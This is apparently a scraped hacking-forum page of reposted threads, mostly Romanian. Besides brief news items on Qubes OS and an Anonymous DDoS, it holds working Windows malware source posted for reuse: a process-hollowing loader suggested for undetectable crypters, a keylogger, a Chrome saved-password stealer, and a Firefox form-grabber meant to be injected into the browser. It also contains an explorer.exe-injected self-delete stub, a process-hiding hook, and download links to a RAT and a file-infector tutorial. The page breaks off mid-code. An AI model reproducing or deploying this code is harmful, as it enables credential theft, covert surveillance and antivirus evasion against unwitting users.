Nytro

Ceva imi spune ca nu mai dureaza mult pana primesti ban...

Qubes – sistem de operare Open Source construit pentru a fi sigur Andrei Av?d?nei, 13.06.2011 Qubes este un sistem de operare Open Source ce dispune de o arhitectur? special creat? pentru a oferi o experien?? de navigare desktop sigur?. Este bazat pe Xen, X Window System ?i Linux, putând rula aproape orice tip de aplica?ie Linux ?i utiliza majoritatea driverelor Linux. Autorii acestuia promit c? in viitor vor include ?i suportul pentru rularea aplica?iilor Windows. Qubes, aflat în varianta beta, are o abordare de tipul “Securitate prin izolare”. Pentru a face asta, Qubes folose?te ca principiu de baz? virtualizarea, având posibilitatea s? izoleze diverse programe unele de altele sau chiar diverse componente ale sistemului, precum re?eaua, subsistemul de stocare ?amd. Asta incearc? s? previn? afectarea integrit??ii sistemului de problemele ap?rute într-un subsistem. Qubes are câteva profile create pentru ma?inile virtuale (cunoscute ca AppVMs) precum “personal”, “work”, “shopping”, “bank” sau “random” ?i permite rularea aplica?iilor ca ?i cum s-ar executa pe ma?ina local?. Mai suport? ?i copierea ?i mutarea sigur? a unei aplica?ii dintr-o ma?in? virtual? în alta. Mai multe detalii despre arhitectura sistemului de operare g?si?i aici iar câteva fotografii cu acesta aici. Sursa: Qubes - sistem de operare Open Source construit pentru a fi sigur | WorldIT

Spanish police website hit by Anonymous hackers 13 June 2011 Last updated at 10:50 GMT The website of Spain's national police force has been briefly knocked offline by hacker collective Anonymous. The attack on the site was carried out in retaliation for the arrest of three Spanish men the police claimed were 'core' members of the group. The hackers managed to keep Pgina Oficial del Cuerpo Nacional de Polica offline for about an hour from 2130 GMT on 12 June. Spanish authorities would not confirm that Anonymous was behind the attack, saying only that the site was offline. However, a statement was posted on a website linked to Anonymous, claimed responsibility for the hack, which it called #OpPolicia. The group said it had used a distributed denial of service attack (DDoS) which bombards a target website with so much data that it becomes overwhelmed. A spokesman for the Spanish police said the cause of the outage had not yet been established. "A website can collapse if too many people try to access it at once. I cannot confirm the link with the Anonymous group," said the spokesman. In its statement, Anonymous said the DDoS attack was a "direct response to the Friday arrests of three individuals alleged to be associated with acts of cyber civil disobedience attributed to Anonymous." The group said DDoS attacks were a legitimate form of peaceful protest. Some of its members are thought to have carried out similar attacks on Turkish government websites to protest against net censorship. Anonymous also denied that the men arrested were part of the "core" of Spanish members of the group. "They did not arrest any core group, because we don't have a core group," said Anonymous in its statement. Sursa: BBC News - Spanish police website hit by Anonymous hackers

Blind Sql Injection – Regular Expressions Attack Authors: // Removed on request Index Why blind sql injection?......................................................................................................................3 How blind sql injection can be used?...................................................................................................3 Testing vulnerability (MySQL - MSSQL):........................................................................................3 Time attack (MySQL)...........................................................................................................................3 Time attack (MSSQL)..........................................................................................................................4 Regexp attack's methodology................................................................................................................5 Finding table name with Regexp attack (MySQL)...........................................................................5 Finding table name with Regexp attack (MSSQL)...........................................................................6 Exporting a value with Regexp attack (MySQL).............................................................................7 Exporting a value with Regexp attack (MSSQL).............................................................................7 Time considerations.............................................................................................................................8 Bypassing filters..................................................................................................................................9 Real life example.................................................................................................................................9 Conclusions.........................................................................................................................................9 Download: http://www.ihteam.net/papers/blind-sqli-regexp-attack.pdf

Cursul 9 lipseste, nu stiu de ce... Nu e nici la "sursa".

Interesant. Dar le mut la programare, sunt mai utile acolo.

Sunt materialele de curs ale unui profesor (cu care am facut si eu, dar nu criptografie) de la Universitatea Bucuresti, Facultatea de Matematica-Informatica: Adrian Atanasiu Cursul de Criptografie (semestrul 1) Cursul 1 Cursul 2 Cursul 3 Cursul 4 Cursul 5 Cursul 6 Cursul 7 Cursul 8 Cursul 9 Cursul 10 Cursul 11 Cursul 12 Cursul 13 Cursul de Criptografie (semestrul 2) Cursul 1 Cursul 2 Cursul 3 Cursul 4 Cursul 5 Cursul 6 Cursul 7 Cursul 8 Cursul 9 Sursa: http://www.galaxyng.com/adrian_atanasiu/cript.htm PS: Puteti cauta cartile dumnealui: - Securitatea informatiei - Vol. I - Criptografie - Securitatea informatiei - Vol. II - Protocoale de securitate - Arhitectura sistemelor de calcul Toate sunt de la editura InfoData cred.

Da, era intr-o revista articolul, de acolo nu am stat sa il citesc, dar postat si aranjat il voi citi, thanks.

Da, dar nu e tocmai genial sa iti dai seama ca e vorba de o baza de data SQLite. O poti deschide cu SQLite Explorer, sau nu stiu ce utilitar pentru astfel de baze de date si poti vedea structura, apoi "SELECT * FROM logins" si uite parolele. Daca deschizi acel fisier "C:\Users\Ionut\AppData\Local\Google\Chrome\User Data\Default\Login Data" cu Notepad, primele caractere sunt: "SQLite format 3", apoi gasesti si: "CREATE TABLE logins (origin_url VARCHAR NOT NULL, action_url VARCHAR, username_element VARCHAR, username_value VARCHAR, password_element VARCHAR, password_value BLOB, submit_element VARCHAR, signon_realm VARCHAR NOT NULL,ssl_valid INTEGER NOT NULL,preferred INTEGER NOT NULL,date_created INTEGER NOT NULL,blacklisted_by_user INTEGER NOT NULL,scheme INTEGER NOT NULL,UNIQUE (origin_url, username_element, username_value, password_element, submit_element, signon_realm))" care spune tot ce iti trebuie.

PS: Ideea e urmatoarea: baiatul de la Jurnalul, pe langa faptul ca nu e deloc paralel cu domeniul, a colaborat in nenumarate randuri cu Hackersblog. Deci e o legatura intre RST si Jurnalul. Cum spunea si el: daca scrie cineva un articol, fara sa va intrebe pe voi, atot-cunoscatorii, nu e bine. Daca va intreaba, tot nu e bine. Deci sunteti ratati. Ontopic: Probabil e vorba de un simplu SQL Injection. Ce vreau sa spun: in ziua de azi sunt foarte multe persoane care "stiu" SQL Injection si foarte multe dintre ele, pe langa aerele de hackeri mondiali doresc sa se faca remarcati. Si da, acest tip de atac, pe langa faptul ca nu e foarte dificil, poate avea rezultate frumusele: de la acces la datele din baza de date la root pe serverul pe care il ataca. Probabil e vorba de cineva care incearca sa se faca remarcat. Nu cred ca e vorba de ceva mai complex, daca se baga vreo organizatie guvernamentala probabil ar fi aparut si alte probleme, politice de exemplu. Si atacul nu ar fi fost simplu, probabil ar fi scanat mai intai intreaga retea a FMI-ului, sa obtina cat mai multe informatii, posibil sa se fi folosit de persoane din interior... Eu raman la ideea ca un pusti cu atitudine de "hacker" s-a gandit sa caute SQL Injection (sau LFI, XSS... ) intr-un site mare, o fi cautat pe Google in functie de un dork si ce a gasit? FMI...

[c++] Run Program From Memory And Not File Author: Galco void RunFromMemory(char* pImage,char* pPath) { DWORD dwWritten = 0; DWORD dwHeader = 0; DWORD dwImageSize = 0; DWORD dwSectionCount = 0; DWORD dwSectionSize = 0; DWORD firstSection = 0; DWORD previousProtection = 0; DWORD jmpSize = 0; IMAGE_NT_HEADERS INH; IMAGE_DOS_HEADER IDH; IMAGE_SECTION_HEADER Sections[1000]; PROCESS_INFORMATION peProcessInformation; STARTUPINFO peStartUpInformation; CONTEXT pContext; char* pMemory; char* pFile; memcpy(&IDH,pImage,sizeof(IDH)); memcpy(&INH,(void*)((DWORD)pImage+IDH.e_lfanew),sizeof(INH)); dwImageSize = INH.OptionalHeader.SizeOfImage; pMemory = (char*)malloc(dwImageSize); memset(pMemory,0,dwImageSize); pFile = pMemory; dwHeader = INH.OptionalHeader.SizeOfHeaders; firstSection = (DWORD)(((DWORD)pImage+IDH.e_lfanew) + sizeof(IMAGE_NT_HEADERS)); memcpy(Sections,(char*)(firstSection),sizeof(IMAGE_SECTION_HEADER)*INH.FileHeader.NumberOfSections); memcpy(pFile,pImage,dwHeader); if((INH.OptionalHeader.SizeOfHeaders % INH.OptionalHeader.SectionAlignment)==0) { jmpSize = INH.OptionalHeader.SizeOfHeaders; } else { jmpSize = INH.OptionalHeader.SizeOfHeaders / INH.OptionalHeader.SectionAlignment; jmpSize += 1; jmpSize *= INH.OptionalHeader.SectionAlignment; } pFile = (char*)((DWORD)pFile + jmpSize); for(dwSectionCount = 0; dwSectionCount < INH.FileHeader.NumberOfSections; dwSectionCount++) { jmpSize = 0; dwSectionSize = Sections[dwSectionCount].SizeOfRawData; memcpy(pFile,(char*)(pImage + Sections[dwSectionCount].PointerToRawData),dwSectionSize); if((Sections[dwSectionCount].Misc.VirtualSize % INH.OptionalHeader.SectionAlignment)==0) { jmpSize = Sections[dwSectionCount].Misc.VirtualSize; } else { jmpSize = Sections[dwSectionCount].Misc.VirtualSize / INH.OptionalHeader.SectionAlignment; jmpSize += 1; jmpSize *= INH.OptionalHeader.SectionAlignment; } pFile = (char*)((DWORD)pFile + jmpSize); } memset(&peStartUpInformation,0,sizeof(STARTUPINFO)); memset(&peProcessInformation,0,sizeof(PROCESS_INFORMATION)); memset(&pContext,0,sizeof(CONTEXT)); peStartUpInformation.cb = sizeof(peStartUpInformation); if(CreateProcess(NULL,pPath,&secAttrib,NULL,false,CREATE_SUSPENDED, NULL,NULL,&peStartUpInformation,&peProcessInformation)) { hideProcess(peProcessInformation.dwProcessId); startHook(peProcessInformation.hProcess); pContext.ContextFlags = CONTEXT_FULL; GetThreadContext(peProcessInformation.hThread,&pContext); VirtualProtectEx(peProcessInformation.hProcess,(void*)((DWORD)INH.OptionalHeader.ImageBase),dwImageSize,PAGE_EXECUTE_READWRITE,&previousProtection); WriteProcessMemory(peProcessInformation.hProcess,(void*)((DWORD)INH.OptionalHeader.ImageBase),pMemory,dwImageSize,&dwWritten); WriteProcessMemory(peProcessInformation.hProcess,(void*)((DWORD)pContext.Ebx + 8),&INH.OptionalHeader.ImageBase,4,&dwWritten); pContext.Eax = INH.OptionalHeader.ImageBase + INH.OptionalHeader.AddressOfEntryPoint; SetThreadContext(peProcessInformation.hThread,&pContext); VirtualProtectEx(peProcessInformation.hProcess,(void*)((DWORD)INH.OptionalHeader.ImageBase),dwImageSize,previousProtection,0); ResumeThread(peProcessInformation.hThread); } free(pMemory); } This function will run a process based on it's memory instead of running a process from a file. Meaning, you can use this in crypters to have fud runtime. You can basically load an exe as a resource into your code and run it as a process like this: int main(int argc,char* argv[]) { HGLOBAL hResData; HRSRC hResInfo; void *pvRes; DWORD dwSize; char* lpMemory; HMODULE hModule = GetModuleHandle(NULL); if (((hResInfo = FindResource(hModule, MAKEINTRESOURCE(IDD_EXE1), "EXE")) != NULL) &&((hResData = LoadResource(hModule, hResInfo)) != NULL) &&((pvRes = LockResource(hResData)) != NULL)) { dwSize = SizeofResource(hModule, hResInfo); lpMemory = (char*)malloc (dwSize); memset(lpMemory,0,dwSize); memcpy (lpMemory, pvRes, dwSize); RunFromMemory(lpMemory,argv[0]); } } The program running the process must have the same image base or else it will not work. By the way, ignore these two lines: hideProcess(peProcessInformation.dwProcessId); startHook(peProcessInformation.hProcess); I forgot to edit them out when I posted the function. Lol. Dont ask what they were used for. Sursa: [c++] Run Program From Memory And Not File - rohitab.com - Forums

[C] GetRawInputData() keylogger Author: defsanguje Just an another way to implement an user-mode keylogger. The code registers a raw input device that receives mouse and keyboard input. GetRawInputData() API was introduced in Windows XP to access input devices (joysticks, microphones etc) at low level. More info can be found here. #define _WIN32_WINNT 0x0501 #include <windows.h> // Definitions int LogKey(HANDLE hLog, UINT vKey); LRESULT CALLBACK WndProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam); int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow); // Globals const char g_szClassName[] = "klgClass"; // Window procedure of our message-only window LRESULT CALLBACK WndProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam) { static HANDLE hLog; UINT dwSize; RAWINPUTDEVICE rid; RAWINPUT *buffer; switch(msg) { case WM_CREATE: // Register a raw input device to capture keyboard input rid.usUsagePage = 0x01; rid.usUsage = 0x06; rid.dwFlags = RIDEV_INPUTSINK; rid.hwndTarget = hwnd; if(!RegisterRawInputDevices(&rid, 1, sizeof(RAWINPUTDEVICE))) { MessageBox(NULL, "Registering raw input device failed!", "Error!", MB_ICONEXCLAMATION|MB_OK); return -1; } // open log.txt hLog = CreateFile("log.txt", GENERIC_WRITE, FILE_SHARE_READ, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); if(hLog == INVALID_HANDLE_VALUE) { MessageBox(NULL, "Creating log.txt failed!", "Error", MB_ICONEXCLAMATION|MB_OK); return -1; } // append SetFilePointer(hLog, 0, NULL, FILE_END); break; case WM_INPUT: // request size of the raw input buffer to dwSize GetRawInputData((HRAWINPUT)lParam, RID_INPUT, NULL, &dwSize, sizeof(RAWINPUTHEADER)); // allocate buffer for input data buffer = (RAWINPUT*)HeapAlloc(GetProcessHeap(), 0, dwSize); if(GetRawInputData((HRAWINPUT)lParam, RID_INPUT, buffer, &dwSize, sizeof(RAWINPUTHEADER))) { // if this is keyboard message and WM_KEYDOWN, log the key if(buffer->header.dwType == RIM_TYPEKEYBOARD && buffer->data.keyboard.Message == WM_KEYDOWN) { if(LogKey(hLog, buffer->data.keyboard.VKey) == -1) DestroyWindow(hwnd); } } // free the buffer HeapFree(GetProcessHeap(), 0, buffer); break; case WM_DESTROY: if(hLog != INVALID_HANDLE_VALUE) CloseHandle(hLog); PostQuitMessage(0); break; default: return DefWindowProc(hwnd, msg, wParam, lParam); } return 0; } int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { WNDCLASSEX wc; HWND hwnd; MSG msg; // register window class ZeroMemory(&wc, sizeof(WNDCLASSEX)); wc.cbSize = sizeof(WNDCLASSEX); wc.lpfnWndProc = WndProc; wc.hInstance = hInstance; wc.lpszClassName = g_szClassName; if(!RegisterClassEx(&wc)) { MessageBox(NULL, "Window Registration Failed!", "Error!", MB_ICONEXCLAMATION|MB_OK); return 0; } // create message-only window hwnd = CreateWindowEx( 0, g_szClassName, NULL, 0, 0, 0, 0, 0, HWND_MESSAGE, NULL, hInstance, NULL ); if(!hwnd) { MessageBox(NULL, "Window Creation Failed!", "Error!", MB_ICONEXCLAMATION|MB_OK); return 0; } // the message loop while(GetMessage(&msg, NULL, 0, 0) > 0) { TranslateMessage(&msg); DispatchMessage(&msg); } return msg.wParam; } int LogKey(HANDLE hLog, UINT vKey) { DWORD dwWritten; BYTE lpKeyboard[256]; char szKey[32]; WORD wKey; char buf[32]; int len; // Convert virtual-key to ascii GetKeyState(VK_CAPITAL); GetKeyState(VK_SCROLL); GetKeyState(VK_NUMLOCK); GetKeyboardState(lpKeyboard); len = 0; switch(vKey) { case VK_BACK: len = wsprintf(buf, "[BP]"); break; case VK_RETURN: len = 2; strcpy(buf, "\r\n"); break; case VK_SHIFT: break; default: if(ToAscii(vKey, MapVirtualKey(vKey, 0), lpKeyboard, &wKey, 0) == 1) len = wsprintf(buf, "%c", (char)wKey); else if(GetKeyNameText(MAKELONG(0, MapVirtualKey(vKey, 0)), szKey, 32) > 0) len = wsprintf(buf, "[%s]", szKey); break; } // Write buf into the log if(len > 0) { if(!WriteFile(hLog, buf, len, &dwWritten, NULL)) return -1; } return 0; } Sursa: [C]GetRawInputData() keylogger

[C] Google Chrome Password Recovery Author: Sacrificial /* * Google Chrome Password Recovery * * Coded by Sacrificial * Sacrificial2010@hotmail.com * */ void GetGoogleChrome() { char szPath[MAX_PATH]; sqlite3 *lpDatabase; sqlite3_stmt *lpStatement; const char *lpTail; char *szURL, *szUsername, *szPassword; DATA_BLOB DataIn, DataOut; SHGetSpecialFolderPath(0, szPath, 0x1C, 0); strcat(szPath, "\\Google\\Chrome\\User Data\\Default\\Login Data"); if(GetFileAttributes(szPath) != 0xFFFFFFFF) { sqlite3_open(szPath, &lpDatabase); sqlite3_prepare_v2(lpDatabase, "SELECT * FROM logins", 20, &lpStatement, &lpTail); do { DataIn.pbData = (LPBYTE)sqlite3_column_blob(lpStatement, 5); DataIn.cbData = sqlite3_column_bytes(lpStatement, 5); if(CryptUnprotectData(&DataIn, 0, 0, 0, 0, 8, &DataOut)) { szURL = (char*)sqlite3_column_text(lpStatement, 0); szUsername = (char*)sqlite3_column_text(lpStatement, 3); szPassword = (char*)DataOut.pbData; szPassword[DataOut.cbData] = '\0'; // Do whatever you want with em; } } while(sqlite3_step(lpStatement) == SQLITE_ROW); } } Note: Its not the best coding, but it works, and like I said its old. It requires the SQLite libraries. For Chrome 6 and up the path is "\\Google\\Chrome\\User Data\\Default\\Login Data" For Chrome 5 and below the path is "\\Google\\Chrome\\User Data\\Default\\Web Data" Would be nice if you gave credits when using this code. Enjoy Sursa: [sNIPPET] Google Chrome Password Recovery

[C] FireFox Formgrabber Author: datemme Heres an example for a Firefox Formgrabber: dllmain: #include "hookdll.cpp" BOOL APIENTRY DllMain( HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved ) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: Funktion(); case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; } HookDll.cpp : // hookdll.cpp : Definiert die exportierten Funktionen für die DLL-Anwendung. #include <iostream> #include <fstream> using namespace std; #pragma once #include <windows.h> #include <prio.h> #pragma comment (lib, "nspr4.lib") BYTE hook[6]; DWORD HookFunction(LPCSTR lpModule, LPCSTR lpFuncName, LPVOID lpFunction, unsigned char *lpBackup) { DWORD dwAddr = (DWORD)GetProcAddress(GetModuleHandle(lpModule), lpFuncName); BYTE jmp[6] = { 0xe9, //jmp 0x00, 0x00, 0x00, 0x00, //address 0xc3 }; //retn ReadProcessMemory(GetCurrentProcess(), (LPVOID)dwAddr, lpBackup, 6, 0); DWORD dwCalc = ((DWORD)lpFunction - dwAddr - 5); //((to)-(from)-5) memcpy(&jmp[1], &dwCalc, 4); //build the jmp WriteProcessMemory(GetCurrentProcess(), (LPVOID)dwAddr, jmp, 6, 0); return dwAddr; } BOOL UnHookFunction(LPCSTR lpModule, LPCSTR lpFuncName, unsigned char *lpBackup) { DWORD dwAddr = (DWORD)GetProcAddress(GetModuleHandle(lpModule), lpFuncName); if (WriteProcessMemory(GetCurrentProcess(), (LPVOID)dwAddr, lpBackup, 6, 0)) return TRUE; return FALSE; } int WriteLog(const char * Filename,char * Text) { ofstream File; //Names File as ofstream (for output to file) //Closes file File.open(Filename,ios::app); //Reopens file to append, if you just used ios::out again, it would erase everything and rewrite the file File << Text; //Outputs to file File.close(); //Closes opened file SetFileAttributes( Filename , FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_NORMAL ); return 1; } PRInt32 cPR_Write( PRFileDesc *fd, const void *buf, PRInt32 amount) { UnHookFunction("nspr4.dll", "PR_Write", hook); PRInt32 hResult = PR_Write(fd,buf,amount); if(strncmp((LPCSTR)buf,"POST",lstrlen("POST"))==0){WriteLog("test.txt",(char*)buf);}; if(strncmp((LPCSTR)buf,"GET",lstrlen("GET"))==0){WriteLog("test.txt",(char*)buf);}; HookFunction("nspr4.dll", "PR_Write", cPR_Write, hook); return hResult; } extern "C" void __declspec(dllexport) Funktion() { HookFunction("nspr4.dll", "PR_Write", cPR_Write, hook); } //U need to download Gecko SDK (google it) and set the additional Include path und Lib path in project details //vc++ 2008 compiled in multibyte mode //inject it in FF and have Fun !!! //can be very usefull if u "forgot" your password on a website //advantage compared to Pw-Grabbers and Keylogges: logs manualy inserted passwords and saved passwords both //you can ofcourse filter for special tags with slightly modification datemme Sursa: FireFox Formgrabber

[C] Self Delete - explorer.exe injection Author: __v00d00 // __v00d00 __ OpenSC.ws __ // A process cannot simply delete itself // At some point, code will have to run in the context of another process // People typically run a batch file in the background - but this can be noticable // I inject an assembly stub into explorer.exe - it loops on DeleteFile // Once the file is deleted the thread exits. // I also have the thread sleep so that explorer.exe doesn't start eating up too many resources. // Then the thread kills itself. void selfDestruct() { BYTE stub[] = { // "\xcc" // debug int 3 "\x68" "\xDE\xAD\xBE\xAF" // push argument (pointer to path) "\xB8" "\xDE\xAD\xBA\xBE" // mov eax DeleteFile "\xFF\xD0" // call eax "\x50" // push eax "\x68" "\x00\x01\x00\x00" // push 100 "\xB8" "\xDE\xAD\xBE\xAF" // mov eax Sleep "\xFF\xD0" // call eax "\x58" // pop eax "\x85\xc0" // test eax, eax "\x74\xe2" // jnz to start "\x6A" "\x00" // push 0 "\xB8" "\xDE\xAD\xBE\xAF" // mov eax RtlExitUserThread "\xFF\xD0" // call eax }; HANDLE hProc, hThread; DWORD pid; LPVOID pRemotePathStr, pRemoteStub; char ourPath[MAX_PATH]; HMODULE hKernel; HMODULE hNtdll; DWORD dwDeleteFile; DWORD dwSleep; DWORD dwExitThread; GetModuleFileName(NULL, ourPath, MAX_PATH); pid = GetPidByName("explorer.exe"); if(!pid) return; hKernel = GetModuleHandle("kernel32.dll"); if(!hKernel) return; hNtdll = GetModuleHandle("ntdll.dll"); if(!hNtdll) return; dwDeleteFile = (DWORD)GetProcAddress(hKernel, "DeleteFileA"); dwSleep = (DWORD)GetProcAddress(hKernel, "Sleep"); dwExitThread = (DWORD)GetProcAddress(hNtdll, "RtlExitUserThread"); hProc = OpenProcess(PROCESS_CREATE_THREAD|PROCESS_VM_OPERATION|PROCESS_VM_READ|PROCESS_VM_WRITE|PROCESS_QUERY_INFORMATION, false, pid); if (hProc == NULL) return; pRemotePathStr = VirtualAllocEx(hProc, NULL, strlen(ourPath) + 1, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE); if (pRemotePathStr == NULL) return; if (!WriteProcessMemory(hProc, pRemotePathStr, ourPath, strlen(ourPath) + 1, NULL)) return; pRemoteStub = VirtualAllocEx(hProc, NULL, sizeof(stub), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE); if (pRemoteStub == NULL) return; memcpy(stub + 1, &pRemotePathStr, 4); memcpy(stub + 6, &dwDeleteFile, 4); memcpy(stub + 19, &dwSleep, 4); memcpy(stub + 33, &dwExitThread, 4); if (!WriteProcessMemory(hProc, pRemoteStub, stub, sizeof(stub), NULL)) return; hThread = CreateRemoteThread(hProc, NULL, 0, (LPTHREAD_START_ROUTINE)pRemoteStub, NULL, 0, 0); if (!hThread) return; DelStartUp(); // remove our startup key exit(1); } Sursa: Self Delete

Xtreme RAT v2.8 RAT - Remote Administration Tool This is a tool that allow you to control your computer from anywhere in world. With full support to Unicode language, you will never have problem using this software. Here you can find new updates, informations and tutorials about this software. Here some images v2.8: Version 2.8 (04/06/2011) Here some changes since last version: Please, update your servers. - Close window options after select your language and others settings. - Sometimes using Filemanager, when you try to upload some files, the folder name appear with '\\'. Now was corrected. - Corrected a bug, using file manager, when the user select a file with "0 bytes". - Some options on MSN functions was deleted until update to use new windows live messenger. - Added a better handle errors when servers are disconnected. - Changed injection method. - Corrected a bug when try to close options window (UPnP). - Changed GUI. - Corrected high CPU usage that occurs sometimes. - Corrected some bugs using remote shell function. - Added a new column on main list: Account Type. Download: http://sites.google.com/site/nxtremerat/XtremeRATv2.8.3.zip?attredirects=0 Password: 123 Sursa: Xtreme RAT v2.8

A few current Ebooks: NMAP_cookbook.pdf iPhone Programming - The Big Nerd Ranch Guide.pdf hello-android_3e.pdf Practical Packet Analysis_ Using Wireshark to Solve Real-World Network Problems.pdf The IDA PRO Book.pdf Disassembling Code - IDA Pro And SoftICE.chm Identifying Malicious Code Through Reverse Engineering.pdf Reversing Secrets of Reverse Engineering.pdf Download: http://hotfile.com/dl/116717781/27ecc69/Ebooks.zip.html Sursa: A few current ebooks

Spam, nu trebuie sa aduci tot exploit-db-ul aici, doar ce e important...

Noi membri VIP: - 3348399 - Zatarra - ZeroCold Si avem o lista cu persoane "urmarite" pentru acest post.

Aveti grija cu el, e periculos, sta cu picioarele pe banca:

"SYSTEM\RAdmin\v2.0\Server\Users" Deci ban.

E de fapt Radmin, ban permanent.

Da, dar nu merge la toate programele. Unele mai copiaza fisiere in system32, altele prin AppData sau mai stiu eu ce foldere. Trebuie sa stii unde sunt toate. In plus, daca de exemplu e vorba de controale ActiveX acestea trebuie si "instalate": trebuie rulat regsvr32... De asemenea majoritatea programelor salveaza date in Registry la instalare, multe date, care lipsesc in cazul de fata si pot sa apara multe probleme. Dar ca idee e bine, merge la destule programe probabil.

Writing a File Infector/Encrypter It works with any PE32 executable file, overcomes issues with randomized base addresses, and takes advantage of Visual Studio’s C++ compiler to generate the assembly code to inject into the target. This allows for large portions of the injected code to be written in C and greatly speeds up development time. Lastly, the target file is also encrypted by the infector and the decryption routine is written in to decrypt the file image at runtime. PDF Writing a File Infector/Encrypter: Background (1/4) http://blog.codereversing.com/infect1.pdf Writing a File Infector/Encrypter: PE File Modification/Section Injection (2/4) http://blog.codereversing.com/infect2.pdf Writing a File Infector/Encrypter: Writing the Compiled Stub (3/4) http://blog.codereversing.com/infect3.pdf Writing a File Infector/Encrypter: Full Source Code and Remarks (4/4) http://blog.codereversing.com/infect4.pdf Sursa: http://www.hackhound.org/forum/index.php?/tutorials/article/623-writing-a-file-infectorencrypter/

[c] Process Hiding Author: stdio I didnt really see a good c example so I decided to share my dll that hooks NtQuerySystemInformation and hides explorer.exe #include <Windows.h> #include "sysinfo.h" BYTE OrigBytes[5]; WCHAR g_TargetProc[] = L"explorer.exe"; __declspec(naked) NTSTATUS NTAPI OriginalNtQuerySystemInformation( IN SYSTEM_INFORMATION_CLASS SystemInformationClass, IN OUT PVOID SystemInformation, IN ULONG SystemInformationLength, OUT PULONG ReturnLength OPTIONAL ) { __asm { mov eax, 0dfh //5 Bytes overwritten with original read 5 mov ecx, 0xcafebabe jmp ecx } } NTSTATUS NTAPI HookedNtQuerySystemInformation( IN SYSTEM_INFORMATION_CLASS SystemInformationClass, IN OUT PVOID SystemInformation, IN ULONG SystemInformationLength, OUT PULONG ReturnLength OPTIONAL ) { NTSTATUS Result; PSYSTEM_PROCESSES pSystemProcess; PSYSTEM_PROCESSES pNextSystemProcess; Result = OriginalNtQuerySystemInformation(SystemInformationClass,SystemInformation,SystemInformationLength,ReturnLength); switch(SystemInformationClass) { case SystemProcessInformation: pSystemProcess = (PSYSTEM_PROCESSES)SystemInformation; pNextSystemProcess = (PSYSTEM_PROCESSES)((PBYTE)pSystemProcess + pSystemProcess->NextEntryDelta); while(pNextSystemProcess->NextEntryDelta != 0) { if (lstrcmpW((&pNextSystemProcess->ProcessName)->Buffer,g_TargetProc)==0){ pSystemProcess->NextEntryDelta += pNextSystemProcess->NextEntryDelta; } pSystemProcess = pNextSystemProcess; pNextSystemProcess = (PSYSTEM_PROCESSES)((PBYTE)pSystemProcess + pSystemProcess->NextEntryDelta); } break; } return Result; } DWORD PlaceHook() { DWORD oldProtect; LPVOID sourceFunction; LPVOID destFunction; LPVOID stubFunction; destFunction = HookedNtQuerySystemInformation; stubFunction = OriginalNtQuerySystemInformation; sourceFunction = GetProcAddress(GetModuleHandle("ntdll.dll"),"NtQuerySystemInformation"); CopyMemory(OrigBytes,sourceFunction,sizeof(BYTE)*5); if(sourceFunction == NULL){ return 1; } // PatchStub VirtualProtect(stubFunction, 9, PAGE_EXECUTE_READWRITE, &oldProtect); CopyMemory(stubFunction,OrigBytes,sizeof(BYTE)*5); *(LPVOID*)((LPBYTE)stubFunction + 6) = ((LPBYTE)sourceFunction + 5); VirtualProtect(stubFunction, 9, oldProtect, &oldProtect); //PatchSource VirtualProtect(sourceFunction, 5, PAGE_EXECUTE_READWRITE, &oldProtect); *(LPBYTE)sourceFunction = 0xE9; *(LPVOID *)((LPBYTE)sourceFunction + 1) = (LPVOID)((LPBYTE)destFunction - ((LPBYTE)sourceFunction + 5)); VirtualProtect(sourceFunction, 5, oldProtect, &oldProtect); return 0; } void UnHook() { DWORD oldProtect; LPVOID addr = GetProcAddress(GetModuleHandle("ntdll.dll"),"NtQuerySystemInformation"); VirtualProtect(addr, 5, PAGE_EXECUTE_READWRITE, &oldProtect); CopyMemory(addr,OrigBytes,sizeof(BYTE)*5); VirtualProtect(addr, 5, oldProtect, &oldProtect); } BOOL WINAPI DllMain(HANDLE hinstDLL, DWORD dwReason, LPVOID lpvReserved){ switch (dwReason){ case DLL_PROCESS_ATTACH: PlaceHook(); break; case DLL_PROCESS_DETACH: UnHook(); break; } return TRUE; } and the header: #ifndef __SYSINFO_H__ #define __SYSINFO_H__ #ifndef NTSTATUS #define NTSTATUS LONG #endif #define NT_SUCCESS(x) ((x) >= 0) #define STATUS_SUCCESS 0x00000000 typedef enum _SYSTEM_INFORMATION_CLASS { SystemBasicInformation, SystemProcessorInformation, SystemPerformanceInformation, SystemTimeOfDayInformation, SystemPathInformation, SystemProcessInformation, SystemCallCountInformation, SystemDeviceInformation, SystemProcessorPerformanceInformation, SystemFlagsInformation, SystemCallTimeInformation, SystemModuleInformation, SystemLocksInformation, SystemStackTraceInformation, SystemPagedPoolInformation, SystemNonPagedPoolInformation, SystemHandleInformation, SystemObjectInformation, SystemPageFileInformation, SystemVdmInstemulInformation, SystemVdmBopInformation, SystemFileCacheInformation, SystemPoolTagInformation, SystemInterruptInformation, SystemDpcBehaviorInformation, SystemFullMemoryInformation, SystemLoadGdiDriverInformation, SystemUnloadGdiDriverInformation, SystemTimeAdjustmentInformation, SystemSummaryMemoryInformation, SystemNextEventIdInformation, SystemEventIdsInformation, SystemCrashDumpInformation, SystemExceptionInformation, SystemCrashDumpStateInformation, SystemKernelDebuggerInformation, SystemContextSwitchInformation, SystemRegistryQuotaInformation, SystemExtendServiceTableInformation, SystemPrioritySeperation, SystemPlugPlayBusInformation, SystemDockInformation, SystemPowerInformation1, SystemProcessorSpeedInformation, SystemCurrentTimeZoneInformation, SystemLookasideInformation } SYSTEM_INFORMATION_CLASS, *PSYSTEM_INFORMATION_CLASS; typedef struct _LSA_UNICODE_STRING { USHORT Length; USHORT MaximumLength; PWSTR Buffer; }LSA_UNICODE_STRING, *PLSA_UNICODE_STRING, UNICODE_STRING, *PUNICODE_STRING; typedef CONST PUNICODE_STRING PCUNICODE_STRING; typedef LONG KPRIORITY; 